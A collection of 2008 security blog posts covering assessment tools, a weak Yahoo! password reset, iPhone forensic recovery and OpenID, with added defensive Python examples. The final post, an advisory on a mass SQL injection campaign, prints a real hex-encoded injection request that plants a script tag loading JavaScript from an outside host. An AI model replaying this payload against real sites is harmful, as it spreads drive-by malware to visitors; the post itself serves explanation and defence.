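    """Parse one firewall event line; return None for anything else."""
    m = EVENT_RE.match(line)
    if not m:
        return None
    proto = m.group("proto")
    return FirewallEvent(
        timestamp=m.group("ts"),
        host=m.group("host"),
        action=m.group("action"),
        process=m.group("process"),
        src_ip=m.group("src_ip"),
        src_port=int(m.group("src_port")),
        proto=int(proto) if proto else None,
    )


def parse_log(text: str) -> List[FirewallEvent]:
    """Parse a whole log, attributing repeat lines to the previous event."""
    events: List[FirewallEvent] = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        rep = REPEAT_RE.match(line)
        if rep and events:
            events[-1].count += int(rep.group("n"))
            continue
        ev = parse_line(line)
        if ev:
            events.append(ev)
    return events


def is_blocked_dhcp_offer(ev: FirewallEvent) -> bool:
    """True when the firewall dropped a DHCP server reply destined for configd."""
    return (ev.action == "Deny" and ev.process == "configd"
            and ev.proto == UDP and ev.src_port == DHCP_SERVER_PORT)


def blocked_dhcp_by_server(text: str) -> Dict[str, int]:
    """Total blocked DHCP replies per DHCP server address, repeats included."""
    totals: Dict[str, int] = {}
    for ev in parse_log(text):
        if is_blocked_dhcp_offer(ev):
            totals[ev.src_ip] = totals.get(ev.src_ip, 0) + ev.count
    return totals


if __name__ == "__main__":
    for server, n in blocked_dhcp_by_server(SAMPLE_LOG).items():
        print(f"firewall dropped {n} DHCP replies from {server}; "
              f"check the rule for configd before touching the network stack")
```

Feed it the contents of the log opened via the Open Log button described in the post; a non-empty result points at the firewall rather than at the access point or the DHCP lease, which is the conclusion the post reached only after a day of trial and error.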

While at the TechEd EMEA conference is Spain this week, I had the opportunity to visit with Thomas Dawkins from Microsoft's Trustworthy Computing Group. He's the guy responsible for the Microsoft Security Assessment Tool (or MSAT for short). The MSAT is a tool that's been around for a couple of years, but it was recently updated by Thomas with some great new enhancements, including a new user interface and a stronger, more complete set of back end information.

MSAT is a free tool that you can download from Microsoft. It's targeted to companies of 1,500 employees or smaller (as a general rule) and follows a questionnaire format to assess weaknesses in the IT security environment. Bt it's not a parching tool or a scanning tool. Instead, it leverages standards like ISO 27001 and NIST-800.x to baseline the security readiness of your organization.

It enables people to do what we security professionals hope for: analysis across each of the people, process and technology elements of a business' computing environment in order to ascertain how and where we need to spend our time and energy. The tool not only describes the state of readiness of the assessed environment, it also provides best-practice recommendations rooted in industry-accepted standards that can be used to improve the organization's security stance.

One of the most likely users of a tool like this is the IT manager, but one can also picture security consultants, business managers, and anyone else with responsibility for an organization's security operations leveraging the tool and the reports it generates.

You'll also likely be interested to know that Microsoft has released the fifth version of its Security Intelligence Report, which looks at the state of computer and information security over the past six months. You can find links to the full report and the key findings summary documents on Microsoft's web site.



Microsoft's Security Assessment Tool - Check your organization's security stance
http://www.greghughes.net/rant/PermaLink,guid,eba8bad8-1993-49a7-afeb-0b099aa1b22e.aspx
http://www.greghughes.net/rant/MicrosoftsSecurityAssessmentToolCheckYourOrganizationsSecurityStance.aspx
Fri, 07 Nov 2008 15:01:17 GMT
Links in the post: the Microsoft Security Assessment Tool (http://go.microsoft.com/?LinkID=4378891); Security Intelligence Report and key findings summary (http://go.microsoft.com/fwlink/?LinkId=131912)
Categories: IT Security, Tech

It's really the classic case study in information (in)security and the need for strong authentication. With all due respect to the good people at Yahoo!, this opportunity to review Internet security mechanisms is too good and too useful to pass up.

By now, we all know Republican vice-presidential candidate Sarah Palin's Yahoo! email account was broken into on Tuesday night (read the link to get the details). Apparently (and fairly obviously), access was gained via the forgotten password mechanism on the Yahoo! webmail interface, which allowed the malicious person to reset the profile's password with just a few pieces of information about the Alaska governor (birthdate, ZIP code and a piece of info related to where she met her spouse) that could be easily discovered by searching Google. The fact that so much of Palin's life history has been documented on the Web makes her that much more vulnerable to knowledge-based security mechanism hacks. It should also be noted that some security questions are better (or stronger) than others, so it's important that the questions you choose for online protection are not ones that can be answered with information available on the Internet.

We security folk frequently talk about something called "multifactor authentication." By "multifactor" we mean an authentication process that requires two or more of the following:

  • Something you know (passwords, user names, answers to questions)
  • Something you have (token, device, phone, etc.)
  • Something you are (physical fingerprint, voiceprint, or other biometric measure such as a verifiable, non-spoofable behavior (some call this "something you do"))

Most multifactor auth systems are pretty easy to recognize. You know them when you see them. Those key fobs or cards with the revolving digits that you have to provide at login are a common example. They're also fairly expensive and complicated. Some multifactor technologies are easier to use than others. There are a variety of behind-the-scenes systems that track user behavior and other markers to determine if the person accessing an account is the legitimate user or a bad guy, for example. A well-designed and well-implemented system balances usability with security strength, and some systems yield higher results in that regard than others.

In this particular case, the bad guy was able to leverage only things he knew (found via a search engine) to change the password on the account and gain access to the Yahoo! Mail account. No other verification or mechanism was required. That's simply weak security in this day and age.

I walked through the account password reset system on my Yahoo! account, just so I could get a first-hand look at how it works and how simple it is to reset an account there. Honestly, it was a little too easy. Here are the details (you can click each image to see them full-size):

First of all, I selected the option on the login screen that says, "Forgot your ID or password?"


Next I was prompted either to supply an email address for reset, or to choose the option to reset without access to a registered email account (which to me was an immediate red flag). Obviously, I chose the latter.


This is where the security mechanism breaks down. I'm immediately asked to answer a "secret" security question. This process is called knowledge-based authentication. It's an additional layer of validation in a single-factor authentication scheme - I have to provide "something else I know." Even in my case it's information that could be fairly easily discovered (assuming I answered the question accurately). It should also be noted that in order to change my security question, I need to contact Yahoo! customer support (which I did).


Once I supply the correct answer to a single question, I'm immediately allowed to change my password. At this point it should be noted that if I were prompted to answer multiple questions in this validation workflow, using some randomization of questions and setting a time limit to answer each one, that would at least make it more difficult for someone to gain unauthorized access. Systems are available to do exactly that (I know, I used to manage a team that built one such authentication app).


I'm asked to verify my ZIP code and country (just for profile information), and that's it. Note that other analyses of this process seemed to say that providing the ZIP code and Country was required to reset, but that was not the case in my review. In fact, it appears the bad guy is just being handed that information after changing the password, for free. Take that info, stick it in your Google and smoke it: More search accuracy for the next phase in your attack. Not good.


I'm then notified that my account is now "up to date." I also got an email notifying me of the changes that were made to an account I had tied to the Yahoo! profile for communication purposes. At least I can rest assured that I'll get an email before the bad guy goes into my profile and removes that address from the account.


I think you're starting to get the picture. The authentication mechanism is only as strong as its weakest part, and the fact that I have an option to reset without ever having to leave the browser window is a problem. Even changing the system to require that I receive an email (which is already the standard reset mechanism) would be better. As it stands today, that's an option, but not a requirement.

Many will argue that hey, it's just an email account, and that Yahoo! can't be expected to implement stronger security on their site as a requirement. I say that's flat out wrong (and what the account was or wasn't used for isn't particularly relevant to this analysis). Email is the number one mechanism used to move information - both innocuous and sensitive - among people. The fact that it's not the best mechanism for doing so ignores the fact that it's how people do things. There are a variety of options available to help ensure only authorized users can get access to email accounts. The fact they are not regularly implemented is a sad state of affairs.

There are many options to strengthen the identification and authentication processes. We can't discuss them all here, but a couple on my mind are described below.

Physical tokens - Making the jump from only having to remember a user name (which is usually the email address, so hardly a secret) and a password to a scheme where one must carry a token and provide information from it in order to log in is quite a leap (carrying yet another piece of technology around doesn't exactly appeal to me), but it works. The costs associated with fulfilling, supporting and maintaining such a system are very real, and for Yahoo! may not be realistic. But there are systems available to those who know and choose to use them that can substantially improve your authentication profile. Check out Omar Shahine's recent blog entry describing how he's securing his accounts in a few ways, including with an OpenID-integrated single-sign-on token system from Verisign.

But, even if you use an OpenID to sign in, what if your OpenID is a Yahoo! ID or other identity that you can reset with a single piece of discoverable knowledge? It still needs to be protected from unauthorized changes and access.

How to do that? There are several ways. I have a couple of favorites, but please feel free to share yours.

Require security changes to take place out of band - One option, probably quicker and less expensive to implement than physical tokens, is using something like an automated telephone call or text message to require the owner of the account to verify a change should be allowed. By registering one or more phone numbers when the account is created and requiring a unique secret be provided via that channel to authorize a change, one can sufficiently secure the account. Vidoop uses a system like this for resetting information on their OpenID accounts. It's simple and it works. It requires me to have the correct device (my phone), uses a different communication channel (the phone network, hence "out-of-band") to contact me and then verifies I am a legitimate user. It requires me to interact as part of any change.
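To make the out-of-band mechanism concrete, here is an added example in Python; it is my own illustration, not code from Yahoo!, Vidoop, JanRain or this blog. It models the reset flow the post argues for: the only thing a requester can do is trigger a code sent to the phone registered at signup (the "something you have" from the multifactor list above), and a reset succeeds only with that code, within a time limit and a small number of attempts. The `OutOfBandReset` class, the `send` callback standing in for the SMS or voice channel, the five-minute lifetime and the three-attempt limit are all assumptions made for the example.

```python
"""Toy model of an out-of-band password reset (added example, not a vendor's code)."""
import hmac
import secrets
import time

CODE_TTL_SECONDS = 300   # assumed policy: a code is good for five minutes
MAX_ATTEMPTS = 3         # assumed policy: three wrong guesses cancel the request


class OutOfBandReset:
    """Password reset that requires a one-time code delivered over a second channel.

    Compared with the single-question flow described in the post, a reset
    needs "something you have" (the registered phone) in addition to the
    account name: knowing facts about the owner is not enough.
    """

    def __init__(self, registered_phones, send, clock=time.time):
        # account -> phone number registered when the account was created (assumption)
        self._phones = dict(registered_phones)
        # send(phone, message) stands in for the SMS or voice channel
        self._send = send
        self._clock = clock
        # account -> [code, expires_at, attempts_left]
        self._pending = {}
        # account -> password; a real system stores a salted hash, never the password
        self.passwords = {}

    def request_reset(self, account):
        """Generate a fresh code and push it to the registered phone.

        Returns False when no channel is registered. Nothing about the profile
        (ZIP code, country, the phone number itself) is shown to the requester:
        the code goes only to the owner's device.
        """
        phone = self._phones.get(account)
        if phone is None:
            return False
        code = f"{secrets.randbelow(10**6):06d}"   # six digits from a CSPRNG
        self._pending[account] = [code, self._clock() + CODE_TTL_SECONDS, MAX_ATTEMPTS]
        self._send(phone, f"Your reset code is {code}")
        return True

    def confirm(self, account, code, new_password):
        """Check the code; change the password only on a match.

        Returns one of: "ok", "no_request", "expired", "bad_code", "locked".
        """
        entry = self._pending.get(account)
        if entry is None:
            return "no_request"
        expected, expires_at, _attempts = entry
        if self._clock() > expires_at:
            del self._pending[account]
            return "expired"
        # constant-time comparison so response timing does not leak matching prefixes
        if not hmac.compare_digest(expected.encode(), code.encode()):
            entry[2] -= 1
            if entry[2] <= 0:
                del self._pending[account]     # guesser must trigger a brand-new code
                return "locked"
            return "bad_code"
        del self._pending[account]             # single use: a replay is refused
        self.passwords[account] = new_password
        return "ok"


def demo():
    """Walk through a wrong guess, a legitimate reset and a replay; returns the outcomes."""
    outbox = []
    svc = OutOfBandReset({"owner@example.com": "+1-555-0100"},   # constructed sample account
                         send=lambda phone, msg: outbox.append((phone, msg)))
    svc.request_reset("owner@example.com")
    real_code = outbox[-1][1].split()[-1]
    guess = "000000" if real_code != "000000" else "111111"
    return [svc.confirm("owner@example.com", guess, "new-pw"),
            svc.confirm("owner@example.com", real_code, "new-pw"),
            svc.confirm("owner@example.com", real_code, "new-pw")]


if __name__ == "__main__":
    print(demo())   # ['bad_code', 'ok', 'no_request']
```

`demo()` returns `["bad_code", "ok", "no_request"]`: a wrong guess fails, the real code works exactly once, and a replay of the same code is refused. Set against the single secret question, the differences are the ones the post asks for: nothing in the flow hands out profile data such as ZIP code or country, a code expires on its own, and guessing the six digits is bounded by the attempt counter rather than by how much of the owner's life is on the Web.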

But the technology options get even better: JanRain's myOpenID, for example, now has a feature called "CallVerifID" that equips your myOpenID for two-factor authentication via the phone. It's quick and easy to set up and instantly protects every login with a multifactor authentication mechanism. I found I was not able to use it with a couple of phone services due to the way they answer the call (I should provide feedback about that, added to my to-do list), but when set up for my cell or home phone it works as advertised.

Expect more of this class of technology in the future. Think, for example, about voice biometrics: Is that really you that's answering your phone? That kind of technology would be very cool if it was reliable. It's a complicated but useful technology that's being refined even as we discuss this.

I would guess that "review of all Internet email accounts" has been added to every campaign manager's list of things to deal with early in the vetting process (not to mention the Secret Service's list). Any of the technologies above would likely have prevented the malicious bad guy from accessing the Yahoo! email account.

In the security world, change only happens when enough people make enough noise, a regulator gives an order, or enough companies feel enough financial pain. This looks like one of those cases where noise is the better option. It's certainly better than regulatory mandates (which tend to create collateral damage), and waiting on big companies to suffer is not exactly a reliable plan.

So... Feeling okay? How safe is your account, really?



A case study in poor authentication: Palin's Yahoo! email account
http://www.greghughes.net/rant/PermaLink,guid,b4ec40c9-c6f2-47e9-bb2b-d4e3f15fc5ac.aspx
http://www.greghughes.net/rant/ACaseStudyInPoorAuthenticationPalinsYahooEmailAccount.aspx
Fri, 19 Sep 2008 03:26:05 GMT
Links in the post: Wired on the Palin break-in (http://blog.wired.com/27bstroke6/2008/09/palin-e-mail-ha.html); Omar Shahine's blog entry (http://www.shahine.com/omar/TwoFactorAuthenticationForTheRestOfUs.aspx); Verisign PIP (https://pip.verisignlabs.com/); Vidoop (http://www.vidoop.com); myOpenID (http://www.myopenid.com); CallVerifID (https://www.myopenid.com/about_callverifid)
Screenshots of the Yahoo! reset walkthrough: http://www.greghughes.net/rant/content/binary/yscreen-capture2.png, http://www.greghughes.net/rant/content/binary/yscreen-capture-13.png, http://www.greghughes.net/rant/content/binary/yscreen-capture-12.png, http://www.greghughes.net/rant/content/binary/yscreen-capture-9.png, http://www.greghughes.net/rant/content/binary/yscreen-capture-10.png, http://www.greghughes.net/rant/content/binary/yscreen-capture-14.png
Categories: IT Security, Tech

Over at Wired's Gadget Labs blog, Brian Chen writes about information discovered during a webcast presentation on Thursday covering the recently discussed iPhone security weaknesses having to do with bypassing the password-protected lock screen.

Jonathan Zdziarski, a data forensics expert and author of the forthcoming book "iPhone Forensics," did the presentation for law enforcement personnel and anyone else who might have a need to access an iPhone to discover information. During the presentation, in which he outlines a method for breaking into the phone with modified firmware and some hairy manipulation, he also showed how the iPhone takes a screenshot of every application the iPhone's user closes by pressing the "home" button. The saved image is used to "draw" the collapsing screen animation you see when your application closes and you're returned to the home screen. The image file is then deleted from the iPhone's storage.

But, nothing is ever really completely "deleted." And in this case, apparently when the temporary image file is killed from storage, the data "on-disk" is not overwritten or otherwise cleaned, so anyone with some basic forensics knowledge can search the iPhone storage space for the old files and recover them easily. You can do the same thing on pretty much any computer.
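The recovery step the post describes can be seen in miniature in the following added example, written in Python for this page; it is my own code, not Zdziarski's toolkit or anything from Apple. It builds a small valid PNG to stand in for the home-button screenshot, writes it to a toy volume whose "delete" only drops the directory entry, and then carves the image back out of the raw bytes by looking for the PNG signature and walking the CRC-checked chunks to IEND. The `ToyVolume` class, the filler pattern and the `overwrite` option are constructed for the example.

```python
"""Carving a "deleted" PNG screenshot out of raw storage (added example)."""
import struct
import zlib

PNG_SIG = b"\x89PNG\r\n\x1a\n"


def _chunk(ctype: bytes, data: bytes) -> bytes:
    """Encode one PNG chunk: 4-byte length, type, data, CRC32 over type+data."""
    body = ctype + data
    return struct.pack(">I", len(data)) + body + struct.pack(">I", zlib.crc32(body) & 0xFFFFFFFF)


def make_png(width: int, height: int, rgb: tuple) -> bytes:
    """Build a minimal solid-colour 8-bit RGB PNG (stand-in for a UI screenshot)."""
    ihdr = struct.pack(">IIBBBBB", width, height, 8, 2, 0, 0, 0)
    raw = b"".join(b"\x00" + bytes(rgb) * width for _ in range(height))  # filter byte 0 per row
    return PNG_SIG + _chunk(b"IHDR", ihdr) + _chunk(b"IDAT", zlib.compress(raw)) + _chunk(b"IEND", b"")


def _png_end(buf: bytes, start: int):
    """Walk the chunks after a signature; return the offset just past IEND, or None if malformed."""
    p = start + len(PNG_SIG)
    while p + 8 <= len(buf):
        length, ctype = struct.unpack(">I4s", buf[p:p + 8])
        if not ctype.isalpha():          # chunk types are four ASCII letters
            return None
        chunk_end = p + 8 + length + 4
        if chunk_end > len(buf):
            return None
        body = buf[p + 4:p + 8 + length]
        (crc,) = struct.unpack(">I", buf[p + 8 + length:chunk_end])
        if zlib.crc32(body) & 0xFFFFFFFF != crc:
            return None                  # corrupted or partly overwritten: not recoverable intact
        p = chunk_end
        if ctype == b"IEND":
            return p
    return None


def carve_pngs(image: bytes) -> list:
    """Recover every intact PNG in a raw byte image, ignoring any file-system metadata."""
    found = []
    pos = image.find(PNG_SIG)
    while pos != -1:
        end = _png_end(image, pos)
        if end is None:
            pos = image.find(PNG_SIG, pos + 1)
            continue
        found.append(image[pos:end])
        pos = image.find(PNG_SIG, end)
    return found


class ToyVolume:
    """A flat byte array plus a name->(offset, length) table standing in for a file system."""

    def __init__(self, size: int):
        # deterministic filler so the demo is reproducible; the PNG signature never occurs in it
        self.blocks = bytearray((bytes(range(256)) * (size // 256 + 1))[:size])
        self.files = {}
        self._next = 0

    def write(self, name: str, data: bytes) -> None:
        self.blocks[self._next:self._next + len(data)] = data
        self.files[name] = (self._next, len(data))
        self._next += len(data)

    def delete(self, name: str, overwrite: bool = False) -> None:
        """Ordinary delete drops only the table entry; overwrite=True also zeroes the bytes."""
        off, length = self.files.pop(name)
        if overwrite:
            self.blocks[off:off + length] = bytes(length)


def demo() -> tuple:
    """Returns (PNGs carved after a plain delete, PNGs carved after an overwriting delete)."""
    shot = make_png(4, 3, (0, 128, 255))   # constructed stand-in for the screenshot
    plain, wiped = ToyVolume(2048), ToyVolume(2048)
    plain.write("shot.png", shot)
    wiped.write("shot.png", shot)
    plain.delete("shot.png")
    wiped.delete("shot.png", overwrite=True)
    return len(carve_pngs(bytes(plain.blocks))), len(carve_pngs(bytes(wiped.blocks)))


if __name__ == "__main__":
    print(demo())   # (1, 0)
```

`demo()` returns `(1, 0)`: the screenshot carves straight back out after an ordinary delete and not at all once its bytes were overwritten. The same signature-and-chunk walk works on any raw image where the file system has merely unlinked the data, which is the post's point about "pretty much any computer". The overwrite branch is the classic mitigation, with the caveat that flash storage with wear levelling may keep copies the host cannot address, so encrypting the storage and destroying the key is the more dependable way to make such files unrecoverable.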

Depending on your point of view, this is either a potential privacy issue or a great forensics feature. Having worked as both a police officer and as a business security professional responsible for privacy and data integrity issues, I can understand both arguments. Certainly as a cop, being able to dig into someone's iPhone (with a proper warrant of course) to find evidence of crimes where the phone was used in some manner is of real value, and screen shots are potentially pretty useful evidence. But as a person who also values privacy as a matter of basic principle, it's a little disconcerting, especially since I didn't realize until today screen shots are being made.

The webcast recording is not yet available as of the time of this writing, but it should be posted to http://www.youtube.com/OreillyMedia in the next few days. If you're interested in learning something about electronic data forensics, it will be worth the time to check it out. Here's the O'Reilly abstract from the session:

In this free, live webcast, iPhone hacker and data forensics expert Jonathan Zdziarski guides you through the steps used by law enforcement agencies to bypass the iPhone 3G's passcode lock by creating a custom firmware bundle. Author of the upcoming book, iPhone Forensics, Jonathan has devoted much of his talent supporting law enforcement personnel with his development of a forensics toolkit that allows them to recover, process, and remove sensitive data stored on the iPhone, iPhone 3G, and iPod Touch. This live presentation is aimed towards law enforcement and anyone else who has a need to access the not-so-readily available data on an iPhone.



greghughes.net weblog - copyright 2009 - licensed under a Creative Commons License (http://creativecommons.org/licenses/by-nc-sa/2.0/).

Privacy flaw or useful feature? Your iPhone is "watching" you
Fri, 12 Sep 2008 04:58:55 GMT
http://www.greghughes.net/rant/PrivacyFlawOrUsefulFeatureYourIPhoneIsWatchingYou.aspx
Links from the post: Brian Chen at Wired's Gadget Lab, http://blog.wired.com/gadgets/2008/09/hacker-says-sec.html; O'Reilly Media on YouTube, http://www.youtube.com/OreillyMedia; Jonathan Zdziarski, http://www.oreillynet.com/pub/au/1861; iPhone Forensics, http://oreilly.com/catalog/9780596153892/
IT Security, Tech

Google seeded a paper comic book to some people recently, to present and describe their future web browser (or you might just think of it as the web browser of the future), which is called Google Browser or Chrome.


So, what's the story? Making the browser more stable, more usable, more secure. At first glance, it looks like a strong starting point for the future of Internet browsers. Written from the ground up, with the experience of several years of past browser platforms to learn from, Google has addressed many of the main concerns in today's browsers.

Now the only question is: When will we get it? I will be watching here to see if something shows up. Hopefully it's soon!

UPDATE: The release date is tomorrow (Tuesday, September 2, 2008) - More info and link to screenshots here.

A variety of technologies are incorporated into the Chrome design that improve on common browser weaknesses. The key improvements fall into the areas of stability (memory allocation and management, process management), some incredibly cool JavaScript environment enhancements (in the form of a new, open-source JavaScript engine), a bunch of user experience improvements and significant security changes.

And, it's all open source. That's right - Anyone (including other browser makers) can leverage the work done in the Chrome project and can contribute or modify to meet their own needs. Good move, Google.


Pretty exciting stuff. It will be fun to see what comes next, and when.



Google's Dream Browser, Chrome: Coming soon to your computer
Mon, 01 Sep 2008 18:57:24 GMT
http://www.greghughes.net/rant/GooglesDreamBrowserChromeComingSoonToYourComputer.aspx
Links from the post: the Chrome comic, http://blogoscoped.com/google-chrome/ (stability, http://blogoscoped.com/google-chrome/3; JavaScript engine, http://blogoscoped.com/google-chrome/12; user experience, http://blogoscoped.com/google-chrome/18; security, http://blogoscoped.com/google-chrome/25; open source and release watch, http://blogoscoped.com/google-chrome/34); update with screenshots, http://www.greghughes.net/rant/MoreOnChromeOfficialGoogleAnnouncementAndScreenshots.aspx
IT Security, Safe Computing, Tech

Vidoop Labs has a dream:

The dream is to see Identity baked into all browsers. Just imagine opening your web browser and then selecting your Identity Provider (IDP) the way you select your default search provider. The benefits are numerous; never type in a username, never look for a login button/page (you are authenticated when you land on a domain), no phishing/MITM (the browser can do domain and SSL cert validation ). You fire up your browser and authenticate (or login) similar to the way you log in to your computer every time you turn it on. The difference is you get to choose your provider and can take control of the data you safeguard, store and share on the Internet.

I could get into that.

Vidoop is a Portland, Oregon company that has built some interesting technology around OpenID. I really like the idea of OpenID, and I have a couple of OpenIDs of my own that I use on various sites. But OpenID is not exactly perfect. It's still relatively young, and from the usability standpoint it needs improvement. The identity and authentication requirements of the modern Internet demand some additional features and capabilities that OpenID doesn't deliver (and you can argue that it shouldn't). By combining OpenID with other technologies (such as Information Cards and other strong-auth offerings) and improving usability for end users, it could become a widely adopted, used and trusted standard, or part of a broader one covering strong authentication and identity protection/assertion in a commonly accepted and deployed package.

Vidoop's Luke Sontag today posted an announcement that the company's newly-formed Vidoop Labs has fired up a community project called IDIB (pronounced "Eye-Dib"), which aims to improve on the OpenID usability model and make it stronger at the same time. They've released a developer preview of IDIB in hopes of involving people and getting your input and feedback.

From the Vidoop announcement:

Over the past few years we’ve seen the adoption of OpenID continue to increase but the work that we’ve done as a community to develop this technology has only just begun. Looking at the landscape of OpenID adoption, it's clear that there are several key factors inhibiting adoption, but two that we want to focus on today, namely usability and security in the browser.

It was almost two years ago when the Firefox 3.0 roadmap was announced and OpenID was mentioned as a new component to the platform. The Mozilla Firefox team looked to members of the OpenID community to step up and provide guidance on what exactly we imagined identity in the browser looking like, but we failed to mobilize and answer their call.

In light of that missed opportunity, Vidoop Labs has been working hard over the last several weeks to produce a prototype that we intend to use to initiate a wider discussion about OpenID in the browser and what it might look like.

And the current developer preview (which is open-source) is just a beginning. Imagine leveraging Information Cards (such as one would use with Microsoft's CardSpace, or the similar open-source offerings for Mac and Linux) in the cloud, and being able to use OpenID - one logon for all your web sites - confidently, securely and with proper security protection.

The Internet needs a good, strong, reliable, usable and secure standard technology to solve the issues related to user names, passwords, single sign on and identity protection. IDIB looks like a serious and positive attempt to start the journey directly down that path.



Vidoop Labs launches Identity in the Browser (IDIB) dream project
Fri, 29 Aug 2008 07:18:19 GMT
http://www.greghughes.net/rant/VidoopLabsLaunchesIdentityInTheBrowserIDIBDreamProject.aspx
Links from the post: Vidoop, http://www.vidoop.com/; Luke Sontag's announcement, http://blog.vidoop.com/archives/163; Vidoop Labs, http://labs.vidoop.com/; IDIB, http://labs.vidoop.com/identity-in-the-browser-idib/; OpenID, http://openid.net/; Firefox 3.0 requirements, http://radar.oreilly.com/2007/01/firefox-30-requirements-are-ou.html; Perspectives cert validation, http://www.cs.cmu.edu/~perspectives/
IT Security, Tech
Well, this is a little embarrassing. Intergalactic malware has made its way into the news. A computer virus on the International Space Station. No AV software on the laptops they use, nor (apparently) is there a process of security checks on personal computer equipment like USB thumb drives carried by astronauts being rocketed to the International Space Station.

Granted, the virus in question in this case is pretty innocuous, and apparently other viruses that have made it into space aboard computer gear in the past (it's really quite difficult to mention that in passing) have also been more of an inconvenience than a real security threat.

But imagine a virus that might make its way on-board and do more damage. Not good. It looks like it's time for some effective process and possibly some basic security technology - You know, just in case.

The author of that virus has something new to brag about, though. That's for sure.



NASA shoots a computer virus into space
Thu, 28 Aug 2008 04:01:30 GMT
http://www.greghughes.net/rant/NASAShootsAComputerVirusIntoSpace.aspx
Links from the post: BBC News, http://news.bbc.co.uk/2/hi/technology/7583805.stm
IT Security, Tech

A bunch of IT and web-app teams have lost a lot of sleep lately...

Over the past several days, a significant number (in the thousands) of web applications, some of them well-known and well-used, have fallen victim to a distributed SQL injection attack that takes advantage of weak or non-existent input validation to inject malicious HTML code that then performs a drive-by malware attack on unsuspecting visitors. Since visitors to your site trust it, if your site has been hacked they are more likely to allow the malware to install on their computer (especially if, for example, the malware is delivered in the form of a browser helper object or something along those lines).

The malware in question appears to steal WoW account information and insert a back-door (trojan) program on PCs it infects (among other things).

Web sites that do not properly validate all input - and by proper I mean trust nothing by default and only allow input that specifically matches what is appropriate - and which run on a Microsoft SQL Server back-end (and possibly other database servers that use the same basic table structure) are at risk. I've observed web sites running on both Apache and IIS that have been hacked; the only common thread is SQL Server (despite reports to the contrary).

About data validation...

I've personally spoken with people from a few companies who have had to contend with the fact that their sites were attacked in this manner over the past several days. In each case, they were utilizing a so-called "black-list" (or "deny-list" to be a little more appropriate) of bad input in their application logic. The problem with black-listing is the cases where you don't realize something should be on the list, or when new threats emerge. Instead, a white-list (or "allow-list") methodology requires you to specify what input is allowed. Your application won't change much over time. The threats will. Deny all by default; it's the only safe way to go.

UPDATE: Neil Carpenter mentions in the comments here that he recently posted an excellent blog entry about using parameterized queries in SQL Server, and he makes some great points. While input validation is a useful and often appropriate layer of security (not all apps are database-driven), solving this specific type of problem using his method is an important idea to look at and leverage. A layered combination of both input validation (where it's practical and workable) and parameterized queries is a good approach, in my opinion.
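As an added example (not code from the post or from Neil Carpenter's entry), here is the layered approach in Python against an in-memory SQLite table standing in for the SQL Server back-end: the concatenated lookup that lets the query-string value alter the statement, the same lookup with the value bound as a parameter, and the hardened version that allow-lists the input shape before binding it. The table, the product ids and the `id` allow-list are constructed for the example.

```python
import re
import sqlite3


# Constructed stand-in for the post's SQL Server back-end. Assumption: the
# concatenation-versus-parameter behaviour shown here holds for any DB-API driver.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT, description TEXT);
        INSERT INTO products VALUES (7, 'Widget', 'A plain widget');
        INSERT INTO products VALUES (8, 'Gadget', 'A plain gadget');
    """)
    return conn


def lookup_concatenated(conn, raw_id):
    """The 'before': the raw query-string value is pasted into the SQL text,
    so whatever the client sends becomes part of the statement."""
    sql = "SELECT name FROM products WHERE id = " + raw_id
    return [row[0] for row in conn.execute(sql)]


def lookup_parameterized(conn, raw_id):
    """Parameter binding only: the value travels as data and is never parsed
    as SQL, so a tautology such as '7 OR 1=1' simply matches no row."""
    rows = conn.execute("SELECT name FROM products WHERE id = ?", (raw_id,))
    return [row[0] for row in rows]


# Allow-list for this one input vector: a product id is 1 to 9 ASCII digits.
# Everything that does not match is denied by default.
ID_ALLOWED = re.compile(r"[0-9]{1,9}")


def is_allowed_id(raw_id):
    """True only when the whole value matches the allow-list (fullmatch, not search)."""
    return ID_ALLOWED.fullmatch(raw_id) is not None


def lookup_hardened(conn, raw_id):
    """The layered version the post's UPDATE recommends: validate against what
    is allowed first, then bind the value as a parameter anyway."""
    if not is_allowed_id(raw_id):
        raise ValueError("rejected: product id must be 1-9 digits")
    rows = conn.execute("SELECT name FROM products WHERE id = ?", (int(raw_id),))
    return [row[0] for row in rows]


if __name__ == "__main__":
    db = make_db()
    for raw in ("7", "7 OR 1=1"):
        print("concatenated :", repr(raw), "->", lookup_concatenated(db, raw))
        print("parameterized:", repr(raw), "->", lookup_parameterized(db, raw))
        try:
            print("hardened     :", repr(raw), "->", lookup_hardened(db, raw))
        except ValueError as err:
            print("hardened     :", repr(raw), "->", err)
```

The concatenated lookup returns both products for `7 OR 1=1`, the parameterized one returns nothing for it, and the hardened one refuses it before the database is ever asked.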

The attack

Secure Computing's TrustedSource (good site, read it) has some detail about the attack...

You'll see this in your web server logs (assuming you are logging, and you sure as heck better be - more on that later):

GET /?';DECLARE%20@S%20CHAR(4000);SET%20@
S=CAST(0x4445434C41524520405420766172636
8617228323535292C40432076617263686172283
430303029204445434C415245205461626C655F4
37572736F7220435552534F5220464F522073656
C65637420612E6E616D652C622E6E616D6520667
26F6D207379736F626A6563747320612C7379736
36F6C756D6E73206220776865726520612E69643
D622E696420616E6420612E78747970653D27752
720616E642028622E78747970653D3939206F722
0622E78747970653D3335206F7220622E7874797
0653D323331206F7220622E78747970653D31363
729204F50454E205461626C655F437572736F722
04645544348204E4558542046524F4D202054616
26C655F437572736F7220494E544F2040542C404
3205748494C4528404046455443485F535441545
5533D302920424547494E2065786563282775706
4617465205B272B40542B275D20736574205B272
B40432B275D3D5B272B40432B275D2B2727223E3
C2F7469746C653E3C736372697074207372633D2
2687474703A2F2F73646F2E313030306D672E636
E2F63737273732F772E6A73223E3C2F736372697
0743E3C212D2D272720776865726520272B40432
B27206E6F74206C696B6520272725223E3C2F746
9746C653E3C736372697074207372633D2268747
4703A2F2F73646F2E313030306D672E636E2F637
37273732F772E6A73223E3C2F7363726970743E3
C212D2D272727294645544348204E45585420465
24F4D20205461626C655F437572736F7220494E5
44F2040542C404320454E4420434C4F534520546
1626C655F437572736F72204445414C4C4F43415
445205461626C655F437572736F72%20AS%20CHA
R(4000));EXEC(@S);HTTP/1.1

This is a hex-encoded injection that, when decoded, produces the following SQL statement string (truncated here; the bad-guy address has been removed):

